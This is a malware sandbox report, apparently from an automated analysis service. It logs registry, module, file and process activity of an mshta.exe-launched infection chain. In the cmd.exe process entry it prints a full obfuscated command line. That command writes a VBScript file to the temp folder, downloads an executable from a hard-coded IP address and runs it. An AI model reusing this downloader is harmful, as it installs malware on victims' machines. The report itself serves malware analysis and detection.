| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | value_name = NoFileMenu, type = REG_NONE |
|
1 |
Module (79)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x74960000 |
|
1 | |
| Load | mshtml.dll | base_address = 0x73ed0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\mshta.exe | base_address = 0x60000 |
|
2 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76220000 |
|
2 | |
| Get Handle | c:\windows\syswow64\kernelbase.dll | base_address = 0x75f40000 |
|
26 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x76490000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\SysWOW64\mshta.exe, size = 260 |
|
3 | |
| Get Filename | - | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\SysWOW64\mshtml.dll, size = 260 |
|
1 | |
| Get Filename | c:\windows\syswow64\mshta.exe | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76234f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76231252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76234208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7623359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = EncodePointer, address_out = 0x77e60fcb |
|
9 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = DecodePointer, address_out = 0x77e59d35 |
|
17 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75f5004f |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventWrite, address_out = 0x77e80c59 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventRegister, address_out = 0x77e5f6ba |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventUnregister, address_out = 0x77e79241 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RegisterApplicationRestart, address_out = 0x7625b53c |
|
1 | |
| Get Address | c:\windows\syswow64\mshtml.dll | function = RunHTMLApplication, address_out = 0x73f2e710 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 7, address_out = 0x76724680 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 2, address_out = 0x76724642 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoGetClassObject, address_out = 0x75d254ad |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 |
Window (4)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 1950389888 |
|
1 | |
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 1950389888 |
|
1 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 |
Keyboard (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID |
|
1 |
System (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-11-27 09:37:07 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 139808 |
|
1 | |
| Get Time | type = Ticks, time = 141056 |
|
1 | |
| Get Time | type = Ticks, time = 141071 |
|
5 | |
| Get Time | type = Ticks, time = 141243 |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Operating System |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Ini (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 |
Process #11: cmd.exe
382
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject("wscript.shell") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = "http://82.118.242.107/~able/1_ga/al/al.exe" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = "JSTCHV.eXe" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject("MSXML2.XMLHTTP") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open "GET", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send ("") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject("ADODB.Stream") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs |
| Initial Working Directory | C:\Program Files\Microsoft Office\Root\Office16\ |
| Monitor | Start Time: 00:01:23, Reason: Child Process |
| Unmonitor | End Time: 00:01:27, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x330 |
| Parent PID | 0x9ac (c:\windows\syswow64\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
3B0
0x
8E8
0x
528
0x
550
0x
15C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00191fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x001a0000 | 0x001a0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00200fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00220000 | 0x00223fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x00230000 | 0x0024ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00250fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00260000 | 0x0028ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00290000 | 0x00293fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x01beffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001bf0000 | 0x01bf0000 | 0x01f32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02040000 | 0x0230efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002340000 | 0x02340000 | 0x0237ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02380000 | 0x023e5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0247ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024c0000 | 0x024c0000 | 0x025bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000025c0000 | 0x025c0000 | 0x0269efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02c22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f00000 | 0x02f00000 | 0x02f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003090000 | 0x03090000 | 0x0318ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x4ab30000 | 0x4ab7bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x74460000 | 0x7448dfff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74600000 | 0x7464bfff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74650000 | 0x74744fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x747f0000 | 0x74810fff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x74820000 | 0x74826fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74960000 | 0x74afdfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (333)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | ZMXZAA.vBS | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | ZMXZAA.vBS | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
21 | |
| Create | ZMXZAA.VBs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Program Files\Microsoft Office\Root\Office16 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Microsoft Office\root\Office16 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
23 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
45 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
98 | |
| Open | STD_INPUT_HANDLE | - |
|
4 | |
| Open | STD_OUTPUT_HANDLE | - |
|
68 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | STD_OUTPUT_HANDLE | size = 1, size_out = 1 |
|
22 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 53 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 96 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 99 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 111 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 77 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 115 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 19 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 10 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 45 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | os_pid = 0x0, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | show_window = SW_SHOWNORMAL |
|
1 |
Module (10)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | SHELL32.dll | base_address = 0x76b00000 |
|
1 | |
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4ab30000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76220000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76234a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x76b21e46 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-27 09:37:09 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 141648 |
|
1 |
Environment (16)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
